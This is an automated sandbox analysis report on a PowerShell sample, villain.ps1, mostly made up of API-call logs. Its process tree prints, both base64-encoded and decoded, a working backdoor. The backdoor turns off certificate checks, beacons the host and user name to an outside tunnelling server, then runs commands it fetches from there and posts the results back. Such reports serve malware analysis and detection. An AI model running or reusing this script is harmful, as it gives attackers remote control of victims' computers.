Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Jan. 24, 2025, 1:52 p.m.	Jan. 24, 2025, 1:56 p.m.

Size	2.6KB
Type	ASCII text, with very long lines
MD5	`74d44231ab81164d658199884f1fe041`
SHA256	`4d04aecf158205a3e0ad7e3e0a69d79a36f9902860746f1310e76d3e2bc06826`
CRC32	`4614C06A`
ssdeep	`48:eANk/YZQDZjtVxxHoJw4eGmxp+tckDOilkdCeuYOPbQkD:eKk/BtXI0xp+tcQ+dZa9D`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\villain.ps1
2552
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -e UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewBhAGQAZAAtAHQAeQBwAGUAIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFgANQAwADkAQwBlAHIAdABpAGYAaQBjAGEAdABlAHMAOwAKAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAVAByAHUAcwB0AEEAbABsAEMAZQByAHQAcwBQAG8AbABpAGMAeQAgADoAIABJAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBQAG8AbABpAGMAeQAgAHsAcAB1AGIAbABpAGMAIABiAG8AbwBsACAAQwBoAGUAYwBrAFYAYQBsAGkAZABhAHQAaQBvAG4AUgBlAHMAdQBsAHQAKAAKAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0ACAAcwByAHYAUABvAGkAbgB0ACwAIABYADUAMAA5AEMAZQByAHQAaQBmAGkAYwBhAHQAZQAgAGMAZQByAHQAaQBmAGkAYwBhAHQAZQAsAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAByAGUAcQB1AGUAcwB0ACwAIABpAG4AdAAgAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBQAHIAbwBiAGwAZQBtACkAIAB7AHIAZQB0AHUAcgBuACAAdAByAHUAZQA7AH0AfQAKACIAQAAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAQwBlAHIAdABpAGYAaQBjAGEAdABlAFAAbwBsAGkAYwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABUAHIAdQBzAHQAQQBsAGwAQwBlAHIAdABzAFAAbwBsAGkAYwB5AAoAJABDAG8AbgBmAGkAcgBtAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAE4AbwBuAGUAIgA7ACQAcwA9ACcAdQBzAC4AbABvAGMAbAB4AC4AaQBvADoAOQAwADAAMwAnADsAJABpAD0AJwA1ADUAZABkADEANgAtADMAYgBkADYAMQA1AC0AMQAzAGMAMQAxAGEAJwA7ACQAcAA9ACcAaAB0AHQAcABzADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA1ADUAZABkADEANgAvACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAvACQAZQBuAHYAOgBVAFMARQBSAE4AQQBNAEUAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBBAHUAdABoAG8AcgBpAHoAYQB0AGkAbwBuACIAPQAkAGkAfQA7AGYAbwByACAAKAA7ADsAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwBiAGQANgAxADUAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBBAHUAdABoAG8AcgBpAHoAYQB0AGkAbwBuACIAPQAkAGkAfQApADsAaQBmACAAKAAkAGMAIAAtAG4AZQAgACcATgBvAG4AZQAnACkAIAB7ACQAcgA9AGkAZQB4ACAAJABjACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwACAALQBFAHIAcgBvAHIAVgBhAHIAaQBhAGIAbABlACAAZQA7ACQAcgA9AE8AdQB0AC0AUwB0AHIAaQBuAGcAIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAcgA7ACQAeAA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQByAGkAIAAkAHAAJABzAC8AMQAzAGMAMQAxAGEAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ACAALQBCAG8AZAB5ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABlACsAJAByACkAIAAtAGoAbwBpAG4AIAAnACAAJwApADsAJAByAD0AJwAnADsAfQAgAHMAbABlAGUAcAAgADAALgA4AH0AfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A
  2676
  - powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" add-type @" using System.Net;using System.Security.Cryptography.X509Certificates; public class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult( ServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}} "@ [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy $ConfirmPreference="None";$s='us.loclx.io:9003';$i='55dd16-3bd615-13c11a';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/55dd16/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/3bd615 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/13c11a -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ');$r='';} sleep 0.8}
    2788

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:52 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 24, 2025, 1:52 p.m.			0	0
IsDebuggerPresent Jan. 24, 2025, 1:52 p.m.			0	0

Command line console output was observed (6 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 24, 2025, 1:52 p.m.	buffer: Unrecognized token in source text. console_handle: 0x00000023	1	1
WriteConsoleW Jan. 24, 2025, 1:52 p.m.	buffer: At line:1 char:10 console_handle: 0x0000002f	1	1
WriteConsoleW Jan. 24, 2025, 1:52 p.m.	buffer: + add-type <<<< @ console_handle: 0x0000003b	1	1
WriteConsoleW Jan. 24, 2025, 1:52 p.m.	buffer: + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordEx console_handle: 0x00000047	1	1
WriteConsoleW Jan. 24, 2025, 1:52 p.m.	buffer: ception console_handle: 0x00000053	1	1
WriteConsoleW Jan. 24, 2025, 1:52 p.m.	buffer: + FullyQualifiedErrorId : UnrecognizedToken console_handle: 0x0000005f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 84 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003063f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003063f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003063f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00306970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00305bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003060f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003060f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618de8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006196a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006196a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006196a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 24, 2025, 1:52 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 271 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02732000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02742000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02743000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02744000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02745000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02746000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02763000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02764000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02766000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02767000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02768000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02769000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:52 p.m.	process_identifier: 2676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
